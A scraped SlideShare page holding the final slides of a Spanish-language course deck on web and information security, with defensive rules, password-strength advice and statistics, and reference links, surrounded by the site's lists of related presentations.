       p   Redes inalámbricas: Kismet, Network Stumbler , ApSniffer
Seguridad de la información



   NORMAS A SEGUIR
Seguridad de la información
p Normas        de defensa
  n   Respetar las políticas de seguridad

  n   Antivirus + Firewall

  n   Siempre tener nuestros servicios, sistemas operativos y
      aplicaciones actualizadas a la última versión conocida
      estable

  n   Utilizar mecanismos de criptografía para almacenar y
      transmitir datos sensibles

  n   Cambiar las claves cada cierto tiempo
Seguridad de la información
p   Normas de defensa
    n   Asignar un responsable de seguridad

    n   Auto-auditar nuestros propios servicios

    n   Autoatacarnos para saber si somos o no vulnerables

    n   Estar siempre alerta. Es muy común: ”a nosotros nadie nos
        ataca”.

    n   No dejar información sensible en directorios web

    n   No usar las mismas claves para servicios distintos
         p   Muy común: la clave de root sea la misma que la de MySQL y la misma que
             Apache ...
Seguridad de la información
p Normas        de defensa
  n   Cambiar los puertos por defecto en servicios no públicos

  n   Aplicar técnicas de Hardening

  n   Para servicios privados y confidenciales utilizar túneles
      seguros (VPN cifradas) en Internet y redes no seguras

  n   Habilitar módulos de seguridad (Ej mod_security en
      Apache)
Seguridad de la información
p Normas        de defensa

  n   Nunca trabajar con ”root” si no es estrictamente necesario

  n   Cerrar puertos y eliminar aplicaciones innecesarias

  n   Proteger las URL (ej: mod_rewrite, o AJAX)
Seguridad de la información
p Normas         de defensa
  n   Elegir contraseñas seguras, mezclando mayúsculas,
      minúsculas, números y caracteres especiales.

  n   Las claves no deben ser palabras coherentes ni de
      diccionario

  n   10 contraseñas mas usadas en la red de 32 millones

       p   123456-12345-123456789-password-iloveyou-princess-
           rockyou-1234567-12345678-abc123
Seguridad de la información
Seguridad de la información
p   Normas de defensa
    n   Datos:
         p   16% usa su primer nombre como contraseña.
         p   14% usa combinaciones excesivamente fáciles de recordar como
             1234, 123456, QWERTY
         p   5% eran nombres de celebridades tipo hanna, matrix o ironman.
         p   4% corresponden a palabras como password o password1.
         p   3% llegan a los límites del WTFismo con simples si, no, whatever.


    n   Contraseña segura simple: s+6o1e$7

    n   Herramientas:
         p http://keepass.info/: almacena
         p http://passworg.badhim.com/: genera y valida
Seguridad de la información


  “Seguridad no es un
       producto,
    es un proceso.”
                      Bruce Schneier
Seguridad de la información


http://www.rompecadenas.com.ar/
http://foro.portalhacker.net/
http://www.elhacker.org
http://www.kriptopolis.org/
Seguridad de la información

More Related Content

What's hot

Seguridad informática introduccion
Seguridad informática introduccionSeguridad informática introduccion
Seguridad informática introduccionCarolina Cols
 
Proyecto de Implementación de una Red
Proyecto de Implementación de una RedProyecto de Implementación de una Red
Proyecto de Implementación de una RedJordy Castro
 
Amenazas contra la seguridad informática
Amenazas contra la seguridad informáticaAmenazas contra la seguridad informática
Amenazas contra la seguridad informáticasalasmendoza97
 
Modulo I: Arquitectura de Seguridad Informática
Modulo I: Arquitectura de Seguridad InformáticaModulo I: Arquitectura de Seguridad Informática
Modulo I: Arquitectura de Seguridad InformáticaJuan Manuel García
 
Diapositivas sistemas de información
Diapositivas sistemas de informaciónDiapositivas sistemas de información
Diapositivas sistemas de informaciónelicamar
 
Virus y antivirus
Virus y antivirusVirus y antivirus
Virus y antiviruskelicita115
 
(H)ac(k)tivismo, Ciberterrorismo y Ciberguerra
(H)ac(k)tivismo, Ciberterrorismo y Ciberguerra(H)ac(k)tivismo, Ciberterrorismo y Ciberguerra
(H)ac(k)tivismo, Ciberterrorismo y CiberguerraJoel A. Gómez Treviño
 
Seguridad física y lógica
Seguridad física y lógicaSeguridad física y lógica
Seguridad física y lógicaEve_And
 
Mapa mental "SISTEMAS DE INFORMACION"
Mapa mental "SISTEMAS DE INFORMACION"Mapa mental "SISTEMAS DE INFORMACION"
Mapa mental "SISTEMAS DE INFORMACION"Arnold Bello
 
Plan de Seguridad en un Centro de Cómputo
Plan de Seguridad en un Centro de CómputoPlan de Seguridad en un Centro de Cómputo
Plan de Seguridad en un Centro de Cómputossuserdd0f8d
 
Estándares para los centros de computo
Estándares para los centros de computoEstándares para los centros de computo
Estándares para los centros de computoJessy Zuñiga
 
Clase 3 metodologías de control interno, seguridad y auditoría
Clase 3   metodologías de control interno, seguridad y auditoríaClase 3   metodologías de control interno, seguridad y auditoría
Clase 3 metodologías de control interno, seguridad y auditoríaedithua
 
03 si mecanismos de seguridad en redes (1)
03 si   mecanismos de seguridad en redes (1)03 si   mecanismos de seguridad en redes (1)
03 si mecanismos de seguridad en redes (1)XAVIER HARO
 
Auditoria informatica
Auditoria informaticaAuditoria informatica
Auditoria informaticadanipadi
 

What's hot (20)

Plan de Contingencia Informatico
Plan de Contingencia InformaticoPlan de Contingencia Informatico
Plan de Contingencia Informatico
 
Seguridad en redes
Seguridad en redesSeguridad en redes
Seguridad en redes
 
Seguridad informática introduccion
Seguridad informática introduccionSeguridad informática introduccion
Seguridad informática introduccion
 
Proyecto de Implementación de una Red
Proyecto de Implementación de una RedProyecto de Implementación de una Red
Proyecto de Implementación de una Red
 
Amenazas contra la seguridad informática
Amenazas contra la seguridad informáticaAmenazas contra la seguridad informática
Amenazas contra la seguridad informática
 
Modulo I: Arquitectura de Seguridad Informática
Modulo I: Arquitectura de Seguridad InformáticaModulo I: Arquitectura de Seguridad Informática
Modulo I: Arquitectura de Seguridad Informática
 
SEGURIDAD INFORMATICA
SEGURIDAD INFORMATICASEGURIDAD INFORMATICA
SEGURIDAD INFORMATICA
 
Diapositivas sistemas de información
Diapositivas sistemas de informaciónDiapositivas sistemas de información
Diapositivas sistemas de información
 
Virus y antivirus
Virus y antivirusVirus y antivirus
Virus y antivirus
 
Extensibilidad y Seguridad
Extensibilidad y SeguridadExtensibilidad y Seguridad
Extensibilidad y Seguridad
 
(H)ac(k)tivismo, Ciberterrorismo y Ciberguerra
(H)ac(k)tivismo, Ciberterrorismo y Ciberguerra(H)ac(k)tivismo, Ciberterrorismo y Ciberguerra
(H)ac(k)tivismo, Ciberterrorismo y Ciberguerra
 
Seguridad física y lógica
Seguridad física y lógicaSeguridad física y lógica
Seguridad física y lógica
 
Pilares de la seguridad informática
Pilares de la seguridad informáticaPilares de la seguridad informática
Pilares de la seguridad informática
 
Mapa mental "SISTEMAS DE INFORMACION"
Mapa mental "SISTEMAS DE INFORMACION"Mapa mental "SISTEMAS DE INFORMACION"
Mapa mental "SISTEMAS DE INFORMACION"
 
Plan de Seguridad en un Centro de Cómputo
Plan de Seguridad en un Centro de CómputoPlan de Seguridad en un Centro de Cómputo
Plan de Seguridad en un Centro de Cómputo
 
Estándares para los centros de computo
Estándares para los centros de computoEstándares para los centros de computo
Estándares para los centros de computo
 
Clase 3 metodologías de control interno, seguridad y auditoría
Clase 3   metodologías de control interno, seguridad y auditoríaClase 3   metodologías de control interno, seguridad y auditoría
Clase 3 metodologías de control interno, seguridad y auditoría
 
03 si mecanismos de seguridad en redes (1)
03 si   mecanismos de seguridad en redes (1)03 si   mecanismos de seguridad en redes (1)
03 si mecanismos de seguridad en redes (1)
 
Auditoria informatica
Auditoria informaticaAuditoria informatica
Auditoria informatica
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 

Viewers also liked

Seguridad en sitios web
Seguridad en sitios webSeguridad en sitios web
Seguridad en sitios webUTPL
 
Seguridad de Aplicaciones Web
Seguridad de Aplicaciones WebSeguridad de Aplicaciones Web
Seguridad de Aplicaciones WebGabriel Arellano
 
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones Webguest80e1be
 
Housing y Seguridad - Web Hosting en Chile
Housing y Seguridad - Web Hosting en ChileHousing y Seguridad - Web Hosting en Chile
Housing y Seguridad - Web Hosting en ChileHosting y Dominio
 
Taller de Arquitectura de Información Parte1 v1.1.1
Taller de Arquitectura de Información Parte1 v1.1.1Taller de Arquitectura de Información Parte1 v1.1.1
Taller de Arquitectura de Información Parte1 v1.1.1cheo.silva
 
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones WebCarlos Fernandez
 
Arquitectura de seguridad de redes
Arquitectura de seguridad de redesArquitectura de seguridad de redes
Arquitectura de seguridad de redesJuan MmnVvr Aguila
 
Modulo III: Seguridad en Servidores
Modulo III: Seguridad en ServidoresModulo III: Seguridad en Servidores
Modulo III: Seguridad en ServidoresJuan Manuel García
 
Novedades en Windows Server 2012 R2
Novedades en Windows Server 2012 R2Novedades en Windows Server 2012 R2
Novedades en Windows Server 2012 R2netmind
 
Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...
Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...
Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...eccutpl
 
Seguridad en la nube exposicion completa
Seguridad en la nube   exposicion completaSeguridad en la nube   exposicion completa
Seguridad en la nube exposicion completaMaxwell Kenshin
 
MCCALL, ISO 9126, ISO 25000
MCCALL, ISO 9126, ISO 25000MCCALL, ISO 9126, ISO 25000
MCCALL, ISO 9126, ISO 25000Oscar Limachi
 

Viewers also liked (20)

Seguridad en sitios web
Seguridad en sitios webSeguridad en sitios web
Seguridad en sitios web
 
Seguridad de Aplicaciones Web
Seguridad de Aplicaciones WebSeguridad de Aplicaciones Web
Seguridad de Aplicaciones Web
 
Seguridad en aplicaciones web
Seguridad en aplicaciones web Seguridad en aplicaciones web
Seguridad en aplicaciones web
 
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones Web
 
Servicios de red complementarios
Servicios de red complementariosServicios de red complementarios
Servicios de red complementarios
 
Seguridad en la nube
Seguridad en la nubeSeguridad en la nube
Seguridad en la nube
 
Housing y Seguridad - Web Hosting en Chile
Housing y Seguridad - Web Hosting en ChileHousing y Seguridad - Web Hosting en Chile
Housing y Seguridad - Web Hosting en Chile
 
Taller de Arquitectura de Información Parte1 v1.1.1
Taller de Arquitectura de Información Parte1 v1.1.1Taller de Arquitectura de Información Parte1 v1.1.1
Taller de Arquitectura de Información Parte1 v1.1.1
 
Examen
ExamenExamen
Examen
 
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones WebSeguridad en Aplicaciones Web
Seguridad en Aplicaciones Web
 
Arquitectura de seguridad de redes
Arquitectura de seguridad de redesArquitectura de seguridad de redes
Arquitectura de seguridad de redes
 
Modulo III: Seguridad en Servidores
Modulo III: Seguridad en ServidoresModulo III: Seguridad en Servidores
Modulo III: Seguridad en Servidores
 
Novedades en Windows Server 2012 R2
Novedades en Windows Server 2012 R2Novedades en Windows Server 2012 R2
Novedades en Windows Server 2012 R2
 
Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...
Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...
Integración de Mecanismos de Seguridad en la arquitectura de Aplicaciones Sof...
 
Riesgo vs rendimiento
Riesgo vs rendimientoRiesgo vs rendimiento
Riesgo vs rendimiento
 
Seguridad en la nube exposicion completa
Seguridad en la nube   exposicion completaSeguridad en la nube   exposicion completa
Seguridad en la nube exposicion completa
 
MCCALL, ISO 9126, ISO 25000
MCCALL, ISO 9126, ISO 25000MCCALL, ISO 9126, ISO 25000
MCCALL, ISO 9126, ISO 25000
 
Protocolos De Seguridad
Protocolos De SeguridadProtocolos De Seguridad
Protocolos De Seguridad
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Protocolos de seguridad informática
Protocolos de seguridad informáticaProtocolos de seguridad informática
Protocolos de seguridad informática
 

Similar to Seguridad Web

Seguridad de la información
Seguridad de la informaciónSeguridad de la información
Seguridad de la informaciónTensor
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad InformaticaMini0986
 
WEBQUEST: Seguridad de la Información. :3
WEBQUEST: Seguridad de la Información. :3WEBQUEST: Seguridad de la Información. :3
WEBQUEST: Seguridad de la Información. :3Ceci Acoltzi
 
Presentación tema 4
Presentación tema 4Presentación tema 4
Presentación tema 4sebi16
 
Power informática
Power informáticaPower informática
Power informática10405878
 
Power informática
Power informáticaPower informática
Power informática10405878
 
C:\Fakepath\Redes Y Seguridad InformáTica
C:\Fakepath\Redes Y Seguridad InformáTicaC:\Fakepath\Redes Y Seguridad InformáTica
C:\Fakepath\Redes Y Seguridad InformáTicaguestc28d961
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticaEvaCuenca
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticapaulabas
 
Trabajo Unificado De Seg Inform
Trabajo Unificado De Seg InformTrabajo Unificado De Seg Inform
Trabajo Unificado De Seg Informpachiuss
 
Violeta Sánchez Rodríguez
Violeta Sánchez RodríguezVioleta Sánchez Rodríguez
Violeta Sánchez Rodríguezcarmelacaballero
 
Tema 4, seguridad informática
Tema 4, seguridad informáticaTema 4, seguridad informática
Tema 4, seguridad informáticaHectorCardona99
 
Seguridad informática-Ana Villarejo Gil.
Seguridad informática-Ana Villarejo Gil.Seguridad informática-Ana Villarejo Gil.
Seguridad informática-Ana Villarejo Gil.carmelacaballero
 

Similar to Seguridad Web (20)

Seguridad de la información
Seguridad de la informaciónSeguridad de la información
Seguridad de la información
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 
5to
5to5to
5to
 
WEBQUEST: Seguridad de la Información. :3
WEBQUEST: Seguridad de la Información. :3WEBQUEST: Seguridad de la Información. :3
WEBQUEST: Seguridad de la Información. :3
 
Presentación tema 4
Presentación tema 4Presentación tema 4
Presentación tema 4
 
Power informática
Power informáticaPower informática
Power informática
 
Power informática
Power informáticaPower informática
Power informática
 
C:\Fakepath\Redes Y Seguridad InformáTica
C:\Fakepath\Redes Y Seguridad InformáTicaC:\Fakepath\Redes Y Seguridad InformáTica
C:\Fakepath\Redes Y Seguridad InformáTica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Trabajo Unificado De Seg Inform
Trabajo Unificado De Seg InformTrabajo Unificado De Seg Inform
Trabajo Unificado De Seg Inform
 
Presentación1
Presentación1Presentación1
Presentación1
 
Presentación1
Presentación1Presentación1
Presentación1
 
Violeta Sánchez Rodríguez
Violeta Sánchez RodríguezVioleta Sánchez Rodríguez
Violeta Sánchez Rodríguez
 
Tema 4, seguridad informática
Tema 4, seguridad informáticaTema 4, seguridad informática
Tema 4, seguridad informática
 
Seguridad(2)
 Seguridad(2) Seguridad(2)
Seguridad(2)
 
Seguridad Y Amenazas
Seguridad Y AmenazasSeguridad Y Amenazas
Seguridad Y Amenazas
 
Seguridad informática-Ana Villarejo Gil.
Seguridad informática-Ana Villarejo Gil.Seguridad informática-Ana Villarejo Gil.
Seguridad informática-Ana Villarejo Gil.
 
Blogger
BloggerBlogger
Blogger
 
SEGURIDAD INFORMATICA
SEGURIDAD INFORMATICASEGURIDAD INFORMATICA
SEGURIDAD INFORMATICA
 

More from ramos866

Presentacion sonido
Presentacion sonidoPresentacion sonido
Presentacion sonidoramos866
 
Diseno grafico dojo_v1
Diseno grafico dojo_v1Diseno grafico dojo_v1
Diseno grafico dojo_v1ramos866
 
Presentacion impress v1
Presentacion impress v1Presentacion impress v1
Presentacion impress v1ramos866
 
Presentacion Tm
Presentacion TmPresentacion Tm
Presentacion Tmramos866
 
Videodixital Sesion 5 Accesorios
Videodixital Sesion 5 AccesoriosVideodixital Sesion 5 Accesorios
Videodixital Sesion 5 Accesoriosramos866
 
Videodixital Sesion 6 Herramientas Video Internet
Videodixital Sesion 6 Herramientas Video InternetVideodixital Sesion 6 Herramientas Video Internet
Videodixital Sesion 6 Herramientas Video Internetramos866
 
Videodixital Sesion 4 Camaras
Videodixital Sesion 4 CamarasVideodixital Sesion 4 Camaras
Videodixital Sesion 4 Camarasramos866
 
Videodixital Sesion 3 Formatos
Videodixital Sesion 3 FormatosVideodixital Sesion 3 Formatos
Videodixital Sesion 3 Formatosramos866
 
Videodixital Sesion 2 Conceptos
Videodixital Sesion 2 ConceptosVideodixital Sesion 2 Conceptos
Videodixital Sesion 2 Conceptosramos866
 
Videodixital Sesion 1 Introduccion
Videodixital Sesion 1 IntroduccionVideodixital Sesion 1 Introduccion
Videodixital Sesion 1 Introduccionramos866
 
Rez Libris
Rez LibrisRez Libris
Rez Librisramos866
 
Object Oriented Programming Course
Object Oriented Programming CourseObject Oriented Programming Course
Object Oriented Programming Courseramos866
 
Cooperative Extension System
Cooperative Extension SystemCooperative Extension System
Cooperative Extension Systemramos866
 
Timeline Of Earth
Timeline Of EarthTimeline Of Earth
Timeline Of Earthramos866
 
Prueba Evaluacion Xp 01
Prueba Evaluacion Xp 01Prueba Evaluacion Xp 01
Prueba Evaluacion Xp 01ramos866
 
Ejercicios PHP
Ejercicios PHPEjercicios PHP
Ejercicios PHPramos866
 
Ejercicios Word 01
Ejercicios Word 01Ejercicios Word 01
Ejercicios Word 01ramos866
 

More from ramos866 (20)

Presentacion sonido
Presentacion sonidoPresentacion sonido
Presentacion sonido
 
Diseno grafico dojo_v1
Diseno grafico dojo_v1Diseno grafico dojo_v1
Diseno grafico dojo_v1
 
Comic2
Comic2Comic2
Comic2
 
Presentacion impress v1
Presentacion impress v1Presentacion impress v1
Presentacion impress v1
 
Web 20
Web 20Web 20
Web 20
 
Presentacion Tm
Presentacion TmPresentacion Tm
Presentacion Tm
 
Videodixital Sesion 5 Accesorios
Videodixital Sesion 5 AccesoriosVideodixital Sesion 5 Accesorios
Videodixital Sesion 5 Accesorios
 
Videodixital Sesion 6 Herramientas Video Internet
Videodixital Sesion 6 Herramientas Video InternetVideodixital Sesion 6 Herramientas Video Internet
Videodixital Sesion 6 Herramientas Video Internet
 
Videodixital Sesion 4 Camaras
Videodixital Sesion 4 CamarasVideodixital Sesion 4 Camaras
Videodixital Sesion 4 Camaras
 
Videodixital Sesion 3 Formatos
Videodixital Sesion 3 FormatosVideodixital Sesion 3 Formatos
Videodixital Sesion 3 Formatos
 
Videodixital Sesion 2 Conceptos
Videodixital Sesion 2 ConceptosVideodixital Sesion 2 Conceptos
Videodixital Sesion 2 Conceptos
 
Videodixital Sesion 1 Introduccion
Videodixital Sesion 1 IntroduccionVideodixital Sesion 1 Introduccion
Videodixital Sesion 1 Introduccion
 
Rez Libris
Rez LibrisRez Libris
Rez Libris
 
Object Oriented Programming Course
Object Oriented Programming CourseObject Oriented Programming Course
Object Oriented Programming Course
 
InSLed
InSLedInSLed
InSLed
 
Cooperative Extension System
Cooperative Extension SystemCooperative Extension System
Cooperative Extension System
 
Timeline Of Earth
Timeline Of EarthTimeline Of Earth
Timeline Of Earth
 
Prueba Evaluacion Xp 01
Prueba Evaluacion Xp 01Prueba Evaluacion Xp 01
Prueba Evaluacion Xp 01
 
Ejercicios PHP
Ejercicios PHPEjercicios PHP
Ejercicios PHP
 
Ejercicios Word 01
Ejercicios Word 01Ejercicios Word 01
Ejercicios Word 01
 

Recently uploaded

Biografía de Charles Coulomb física .pdf
Biografía de Charles Coulomb física .pdfBiografía de Charles Coulomb física .pdf
Biografía de Charles Coulomb física .pdfGruberACaraballo
 
SISTEMA RESPIRATORIO PARA NIÑOS PRIMARIA
SISTEMA RESPIRATORIO PARA NIÑOS PRIMARIASISTEMA RESPIRATORIO PARA NIÑOS PRIMARIA
SISTEMA RESPIRATORIO PARA NIÑOS PRIMARIAFabiolaGarcia751855
 
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docxEliaHernndez7
 
RESULTADOS DE LA EVALUACIÓN DIAGNÓSTICA 2024 - ACTUALIZADA.pptx
RESULTADOS DE LA EVALUACIÓN DIAGNÓSTICA 2024 - ACTUALIZADA.pptxRESULTADOS DE LA EVALUACIÓN DIAGNÓSTICA 2024 - ACTUALIZADA.pptx
RESULTADOS DE LA EVALUACIÓN DIAGNÓSTICA 2024 - ACTUALIZADA.pptxpvtablets2023
 
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICABIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICAÁngel Encinas
 
Prueba de evaluación Geografía e Historia Comunidad de Madrid 2º de la ESO
Prueba de evaluación Geografía e Historia Comunidad de Madrid 2º de la ESOPrueba de evaluación Geografía e Historia Comunidad de Madrid 2º de la ESO
Prueba de evaluación Geografía e Historia Comunidad de Madrid 2º de la ESOluismii249
 
TALLER DE DEMOCRACIA Y GOBIERNO ESCOLAR-COMPETENCIAS N°3.docx
TALLER DE DEMOCRACIA Y GOBIERNO ESCOLAR-COMPETENCIAS N°3.docxTALLER DE DEMOCRACIA Y GOBIERNO ESCOLAR-COMPETENCIAS N°3.docx
TALLER DE DEMOCRACIA Y GOBIERNO ESCOLAR-COMPETENCIAS N°3.docxNadiaMartnez11
 
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURAFORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURAEl Fortí
 
FUERZA Y MOVIMIENTO ciencias cuarto basico.ppt
FUERZA Y MOVIMIENTO ciencias cuarto basico.pptFUERZA Y MOVIMIENTO ciencias cuarto basico.ppt
FUERZA Y MOVIMIENTO ciencias cuarto basico.pptNancyMoreiraMora1
 
Concepto y definición de tipos de Datos Abstractos en c++.pptx
Concepto y definición de tipos de Datos Abstractos en c++.pptxConcepto y definición de tipos de Datos Abstractos en c++.pptx
Concepto y definición de tipos de Datos Abstractos en c++.pptxFernando Solis
 
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADO
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADOTIENDAS MASS MINIMARKET ESTUDIO DE MERCADO
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADOPsicoterapia Holística
 
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptxSEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptxYadi Campos
 
SESION DE PERSONAL SOCIAL. La convivencia en familia 22-04-24 -.doc
SESION DE PERSONAL SOCIAL.  La convivencia en familia 22-04-24  -.docSESION DE PERSONAL SOCIAL.  La convivencia en familia 22-04-24  -.doc
SESION DE PERSONAL SOCIAL. La convivencia en familia 22-04-24 -.docRodneyFrankCUADROSMI
 
EL HABITO DEL AHORRO en tu idea emprendedora22-04-24.pptx
EL HABITO DEL AHORRO en tu idea emprendedora22-04-24.pptxEL HABITO DEL AHORRO en tu idea emprendedora22-04-24.pptx
EL HABITO DEL AHORRO en tu idea emprendedora22-04-24.pptxsisimosolorzano
 
Infografía EE con pie del 2023 (3)-1.pdf
Infografía EE con pie del 2023 (3)-1.pdfInfografía EE con pie del 2023 (3)-1.pdf
Infografía EE con pie del 2023 (3)-1.pdfAlfaresbilingual
 
PLAN DE REFUERZO ESCOLAR MERC 2024-2.docx
PLAN DE REFUERZO ESCOLAR MERC 2024-2.docxPLAN DE REFUERZO ESCOLAR MERC 2024-2.docx
PLAN DE REFUERZO ESCOLAR MERC 2024-2.docxiemerc2024
 
Los avatares para el juego dramático en entornos virtuales
Los avatares para el juego dramático en entornos virtualesLos avatares para el juego dramático en entornos virtuales
Los avatares para el juego dramático en entornos virtualesMarisolMartinez707897
 
6°_GRADO_-_MAYO_06 para sexto grado de primaria
6°_GRADO_-_MAYO_06 para sexto grado de primaria6°_GRADO_-_MAYO_06 para sexto grado de primaria
6°_GRADO_-_MAYO_06 para sexto grado de primariaWilian24
 

Recently uploaded (20)

Biografía de Charles Coulomb física .pdf
Biografía de Charles Coulomb física .pdfBiografía de Charles Coulomb física .pdf
Biografía de Charles Coulomb física .pdf
 
SISTEMA RESPIRATORIO PARA NIÑOS PRIMARIA
SISTEMA RESPIRATORIO PARA NIÑOS PRIMARIASISTEMA RESPIRATORIO PARA NIÑOS PRIMARIA
SISTEMA RESPIRATORIO PARA NIÑOS PRIMARIA
 
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
 
RESULTADOS DE LA EVALUACIÓN DIAGNÓSTICA 2024 - ACTUALIZADA.pptx
RESULTADOS DE LA EVALUACIÓN DIAGNÓSTICA 2024 - ACTUALIZADA.pptxRESULTADOS DE LA EVALUACIÓN DIAGNÓSTICA 2024 - ACTUALIZADA.pptx
RESULTADOS DE LA EVALUACIÓN DIAGNÓSTICA 2024 - ACTUALIZADA.pptx
 
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICABIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
 
Prueba de evaluación Geografía e Historia Comunidad de Madrid 2º de la ESO
Prueba de evaluación Geografía e Historia Comunidad de Madrid 2º de la ESOPrueba de evaluación Geografía e Historia Comunidad de Madrid 2º de la ESO
Prueba de evaluación Geografía e Historia Comunidad de Madrid 2º de la ESO
 
TALLER DE DEMOCRACIA Y GOBIERNO ESCOLAR-COMPETENCIAS N°3.docx
TALLER DE DEMOCRACIA Y GOBIERNO ESCOLAR-COMPETENCIAS N°3.docxTALLER DE DEMOCRACIA Y GOBIERNO ESCOLAR-COMPETENCIAS N°3.docx
TALLER DE DEMOCRACIA Y GOBIERNO ESCOLAR-COMPETENCIAS N°3.docx
 
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURAFORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
 
Supuestos_prácticos_funciones.docx
Supuestos_prácticos_funciones.docxSupuestos_prácticos_funciones.docx
Supuestos_prácticos_funciones.docx
 
FUERZA Y MOVIMIENTO ciencias cuarto basico.ppt
FUERZA Y MOVIMIENTO ciencias cuarto basico.pptFUERZA Y MOVIMIENTO ciencias cuarto basico.ppt
FUERZA Y MOVIMIENTO ciencias cuarto basico.ppt
 
Concepto y definición de tipos de Datos Abstractos en c++.pptx
Concepto y definición de tipos de Datos Abstractos en c++.pptxConcepto y definición de tipos de Datos Abstractos en c++.pptx
Concepto y definición de tipos de Datos Abstractos en c++.pptx
 
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADO
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADOTIENDAS MASS MINIMARKET ESTUDIO DE MERCADO
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADO
 
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptxSEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
SEXTO SEGUNDO PERIODO EMPRENDIMIENTO.pptx
 
SESION DE PERSONAL SOCIAL. La convivencia en familia 22-04-24 -.doc
SESION DE PERSONAL SOCIAL.  La convivencia en familia 22-04-24  -.docSESION DE PERSONAL SOCIAL.  La convivencia en familia 22-04-24  -.doc
SESION DE PERSONAL SOCIAL. La convivencia en familia 22-04-24 -.doc
 
EL HABITO DEL AHORRO en tu idea emprendedora22-04-24.pptx
EL HABITO DEL AHORRO en tu idea emprendedora22-04-24.pptxEL HABITO DEL AHORRO en tu idea emprendedora22-04-24.pptx
EL HABITO DEL AHORRO en tu idea emprendedora22-04-24.pptx
 
Infografía EE con pie del 2023 (3)-1.pdf
Infografía EE con pie del 2023 (3)-1.pdfInfografía EE con pie del 2023 (3)-1.pdf
Infografía EE con pie del 2023 (3)-1.pdf
 
PLAN DE REFUERZO ESCOLAR MERC 2024-2.docx
PLAN DE REFUERZO ESCOLAR MERC 2024-2.docxPLAN DE REFUERZO ESCOLAR MERC 2024-2.docx
PLAN DE REFUERZO ESCOLAR MERC 2024-2.docx
 
Los avatares para el juego dramático en entornos virtuales
Los avatares para el juego dramático en entornos virtualesLos avatares para el juego dramático en entornos virtuales
Los avatares para el juego dramático en entornos virtuales
 
Power Point: Fe contra todo pronóstico.pptx
Power Point: Fe contra todo pronóstico.pptxPower Point: Fe contra todo pronóstico.pptx
Power Point: Fe contra todo pronóstico.pptx
 
6°_GRADO_-_MAYO_06 para sexto grado de primaria
6°_GRADO_-_MAYO_06 para sexto grado de primaria6°_GRADO_-_MAYO_06 para sexto grado de primaria
6°_GRADO_-_MAYO_06 para sexto grado de primaria
 

Seguridad Web

  • 1. Experto en gestión de seguridad de la información JORNADA 2 ramos valcárcel, david david@uvigo.es
